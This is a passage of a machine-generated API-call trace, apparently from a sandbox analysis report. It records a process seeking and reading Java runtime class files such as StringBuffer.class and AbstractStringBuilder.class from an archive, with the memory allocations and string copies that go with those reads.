lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.879] malloc (_Size=0x28) returned 0x21145f0 [0090.880] free (_Block=0x21fe880) [0090.880] strlen (_Str="java/lang/invoke/VolatileCallSite.class") returned 0x27 [0090.880] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/VolatileCallSite.class" | out: _Dest="java/lang/invoke/VolatileCallSite.class") returned="java/lang/invoke/VolatileCallSite.class" [0090.880] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fca80, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52415104) returned 1 [0090.880] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.880] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fcac5, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52415173) returned 1 [0090.880] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x27b, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x27b, lpOverlapped=0x0) returned 1 [0090.880] free (_Block=0x2114500) [0090.881] free (_Block=0x2111870) [0090.884] strlen (_Str="java/lang/StringBuffer.class") returned 0x1c [0090.884] malloc (_Size=0x48) returned 0x2111870 [0090.884] malloc (_Size=0xa0) returned 0x21fe880 [0090.884] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e636, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650422) returned 1 [0090.884] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.884] malloc (_Size=0x1d) returned 0x21143e0 [0090.885] free (_Block=0x21fe880) [0090.885] strlen (_Str="java/lang/StringBuffer.class") returned 0x1c [0090.885] strcpy (in: _Dest=0x208f380, _Source="java/lang/StringBuffer.class" | out: _Dest="java/lang/StringBuffer.class") returned="java/lang/StringBuffer.class" [0090.885] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fa747, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52406087) returned 1 [0090.885] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.886] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fa781, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52406145) returned 1 [0090.886] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x22ff, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x22ff, lpOverlapped=0x0) returned 1 [0090.888] free (_Block=0x21145f0) [0090.888] free (_Block=0x2112680) [0090.906] strlen (_Str="java/lang/AbstractStringBuilder.class") returned 0x25 [0090.906] malloc (_Size=0x48) returned 0x2111af0 [0090.906] malloc (_Size=0xa0) returned 0x21fe880 [0090.906] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e5e3, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54650339) returned 1 [0090.906] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.906] malloc (_Size=0x26) returned 0x21144a0 [0090.907] free (_Block=0x21fe880) [0090.907] strlen (_Str="java/lang/AbstractStringBuilder.class") returned 0x25 [0090.907] strcpy (in: _Dest=0x208e940, _Source="java/lang/AbstractStringBuilder.class" | out: _Dest="java/lang/AbstractStringBuilder.class") returned="java/lang/AbstractStringBuilder.class" [0090.907] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f83a9, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52396969) returned 1 [0090.907] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.908] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f83ec, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52397036) returned 1 [0090.908] ReadFile (in: hFile=0x134, lpBuffer=0x121b6f90, nNumberOfBytesToRead=0x235b, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b6f90*, lpNumberOfBytesRead=0x208e3f0*=0x235b, lpOverlapped=0x0) returned 1 [0090.909] free (_Block=0x21143e0) [0090.909] free (_Block=0x2111870) [0090.911] strlen (_Str="java/lang/Appendable.class") returned 0x1a [0090.911] malloc (_Size=0x48) returned 0x2112680 [0090.911] malloc (_Size=0xa0) returned 0x21fe880 [0090.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e59b, lpNewFilePointer=0x208dd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd00*=54650267) returned 1 [0090.911] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcd0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208dcd0*=0xa0, lpOverlapped=0x0) returned 1 [0090.911] malloc (_Size=0x1b) returned 0x2114290 [0090.911] free (_Block=0x21fe880) [0090.911] strlen (_Str="java/lang/Appendable.class") returned 0x1a [0090.912] strcpy (in: _Dest=0x208de80, _Source="java/lang/Appendable.class" | out: _Dest="java/lang/Appendable.class") returned="java/lang/Appendable.class" [0090.912] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f8240, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=52396608) returned 1 [0090.912] ReadFile (in: hFile=0x134, lpBuffer=0x208d950, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x208d950*, lpNumberOfBytesRead=0x208d8d0*=0x1e, lpOverlapped=0x0) returned 1 [0090.912] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f8278, lpNewFilePointer=0x208d960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d960*=52396664) returned 1 [0090.912] ReadFile (in: hFile=0x134, lpBuffer=0x121b9480, nNumberOfBytesToRead=0x131, lpNumberOfBytesRead=0x208d930, lpOverlapped=0x0 | out: lpBuffer=0x121b9480*, lpNumberOfBytesRead=0x208d930*=0x131, lpOverlapped=0x0) returned 1 [0090.912] free (_Block=0x21144a0) [0090.912] free (_Block=0x2111af0) [0090.917] malloc (_Size=0x48) returned 0x2111af0 [0090.917] malloc (_Size=0xa0) returned 0x21fe880 [0090.917] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e550, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650192) returned 1 [0090.917] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.917] malloc (_Size=0x1e) returned 0x2113f30 [0090.918] free (_Block=0x21fe880) [0090.918] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f63db, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52388827) returned 1 [0090.918] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.920] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f6416, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52388886) returned 1 [0090.920] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1e2a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1e2a, lpOverlapped=0x0) returned 1 [0090.922] malloc (_Size=0x48) returned 0x2112680 [0090.922] malloc (_Size=0xa0) returned 0x21fe880 [0090.922] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e50d, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650125) returned 1 [0090.922] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.922] malloc (_Size=0x16) returned 0x2115470 [0090.923] free (_Block=0x21fe880) [0090.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f4276, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52380278) returned 1 [0090.923] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f42a9, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52380329) returned 1 [0090.924] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2132, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2132, lpOverlapped=0x0) returned 1 [0090.925] malloc (_Size=0x48) returned 0x2111c30 [0090.925] malloc (_Size=0xa0) returned 0x21fe880 [0090.925] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e4bd, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650045) returned 1 [0090.925] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.925] malloc (_Size=0x23) returned 0x21143e0 [0090.926] free (_Block=0x21fe880) [0090.926] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f3d8a, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52379018) returned 1 [0090.926] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.926] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f3dca, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52379082) returned 1 [0090.927] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x4ac, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x4ac, lpOverlapped=0x0) returned 1 [0090.927] malloc (_Size=0x48) returned 0x2111870 [0090.927] malloc (_Size=0xa0) returned 0x21fe880 [0090.927] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e476, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54649974) returned 1 [0090.927] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.927] malloc (_Size=0x1a) returned 0x21144a0 [0090.927] free (_Block=0x21fe880) [0090.928] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f38a6, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52377766) returned 1 [0090.928] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.928] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f38dd, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52377821) returned 1 [0090.928] ReadFile (in: hFile=0x134, lpBuffer=0x121b5130, nNumberOfBytesToRead=0x4ad, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b5130*, lpNumberOfBytesRead=0x208e3f0*=0x4ad, lpOverlapped=0x0) returned 1 [0090.928] malloc (_Size=0x48) returned 0x2112680 [0090.928] malloc (_Size=0xa0) returned 0x21fe880 [0090.928] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e431, lpNewFilePointer=0x208dd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd00*=54649905) returned 1 [0090.928] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcd0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208dcd0*=0xa0, lpOverlapped=0x0) returned 1 [0090.929] malloc (_Size=0x18) returned 0x2115510 [0090.929] free (_Block=0x21fe880) [0090.929] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f37c7, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=52377543) returned 1 [0090.929] ReadFile (in: hFile=0x134, lpBuffer=0x208d950, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x208d950*, lpNumberOfBytesRead=0x208d8d0*=0x1e, lpOverlapped=0x0) returned 1 [0090.929] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f37fc, lpNewFilePointer=0x208d960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d960*=52377596) returned 1 [0090.929] ReadFile (in: hFile=0x134, lpBuffer=0x121b5770, nNumberOfBytesToRead=0xaa, lpNumberOfBytesRead=0x208d930, lpOverlapped=0x0 | out: lpBuffer=0x121b5770*, lpNumberOfBytesRead=0x208d930*=0xaa, lpOverlapped=0x0) returned 1 [0090.930] malloc (_Size=0x48) returned 0x2111c80 [0090.930] malloc (_Size=0xa0) returned 0x21fe880 [0090.930] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e3e6, lpNewFilePointer=0x208d240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d240*=54649830) returned 1 [0090.930] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d210, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208d210*=0xa0, lpOverlapped=0x0) returned 1 [0090.930] malloc (_Size=0x1e) returned 0x21140e0 [0090.930] free (_Block=0x21fe880) [0090.930] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f36fb, lpNewFilePointer=0x208ce40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce40*=52377339) returned 1 [0090.930] ReadFile (in: hFile=0x134, lpBuffer=0x208ce90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce10, lpOverlapped=0x0 | out: lpBuffer=0x208ce90*, lpNumberOfBytesRead=0x208ce10*=0x1e, lpOverlapped=0x0) returned 1 [0090.930] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f3736, lpNewFilePointer=0x208cea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cea0*=52377398) returned 1 [0090.930] ReadFile (in: hFile=0x134, lpBuffer=0x121b59b0, nNumberOfBytesToRead=0x91, lpNumberOfBytesRead=0x208ce70, lpOverlapped=0x0 | out: lpBuffer=0x121b59b0*, lpNumberOfBytesRead=0x208ce70*=0x91, lpOverlapped=0x0) returned 1 [0090.936] malloc (_Size=0x48) returned 0x2111c30 [0090.936] malloc (_Size=0xa0) returned 0x21fe880 [0090.936] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e3a6, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649766) returned 1 [0090.936] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.936] malloc (_Size=0x13) returned 0x2114f10 [0090.937] free (_Block=0x21fe880) [0090.937] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f0540, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52364608) returned 1 [0090.937] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.938] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31f0570, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52364656) returned 1 [0090.938] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x318b, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x318b, lpOverlapped=0x0) returned 1 [0090.941] malloc (_Size=0x48) returned 0x2111b40 [0090.941] malloc (_Size=0xa0) returned 0x21fe880 [0090.941] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e35b, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649691) returned 1 [0090.941] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.941] malloc (_Size=0x1e) returned 0x2114050 [0090.941] free (_Block=0x21fe880) [0090.942] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ed9db, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52353499) returned 1 [0090.942] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.943] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31eda16, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52353558) returned 1 [0090.943] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2b2a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2b2a, lpOverlapped=0x0) returned 1 [0090.945] malloc (_Size=0x48) returned 0x2112680 [0090.945] malloc (_Size=0xa0) returned 0x21fe880 [0090.945] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e31b, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649627) returned 1 [0090.945] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.945] malloc (_Size=0x13) returned 0x2114fb0 [0090.945] free (_Block=0x21fe880) [0090.946] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31eaa56, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52341334) returned 1 [0090.946] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.946] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31eaa86, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52341382) returned 1 [0090.947] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2f55, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2f55, lpOverlapped=0x0) returned 1 [0090.949] malloc (_Size=0x48) returned 0x2111870 [0090.949] malloc (_Size=0xa0) returned 0x121d0b70 [0090.949] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e2d1, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649553) returned 1 [0090.949] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.949] malloc (_Size=0x1d) returned 0x2114500 [0090.950] free (_Block=0x121d0b70) [0090.950] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e9a41, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52337217) returned 1 [0090.950] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.951] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e9a7b, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52337275) returned 1 [0090.951] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xfdb, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xfdb, lpOverlapped=0x0) returned 1 [0090.952] malloc (_Size=0x48) returned 0x2111af0 [0090.952] malloc (_Size=0xa0) returned 0x121d0b70 [0090.952] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e28c, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649484) returned 1 [0090.952] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.952] malloc (_Size=0x18) returned 0x21152d0 [0090.953] free (_Block=0x121d0b70) [0090.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e8a25, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52333093) returned 1 [0090.953] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.954] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e8a5a, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52333146) returned 1 [0090.954] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xfe7, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xfe7, lpOverlapped=0x0) returned 1 [0090.955] malloc (_Size=0x48) returned 0x2112680 [0090.955] malloc (_Size=0xa0) returned 0x121d0b70 [0090.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e238, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649400) returned 1 [0090.955] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.955] malloc (_Size=0x27) returned 0x2114050 [0090.956] free (_Block=0x121d0b70) [0090.956] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e7bb4, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52329396) returned 1 [0090.956] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.957] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e7bf8, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52329464) returned 1 [0090.957] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xe2d, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xe2d, lpOverlapped=0x0) returned 1 [0090.958] malloc (_Size=0x48) returned 0x2111870 [0090.958] malloc (_Size=0xa0) returned 0x121d0b70 [0090.958] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e1e4, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649316) returned 1 [0090.958] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.958] malloc (_Size=0x27) returned 0x2114080 [0090.959] free (_Block=0x121d0b70) [0090.959] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e6b68, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52325224) returned 1 [0090.959] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.960] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e6bac, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52325292) returned 1 [0090.960] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1008, lpNumberOfBytesRead=0x208ee30, 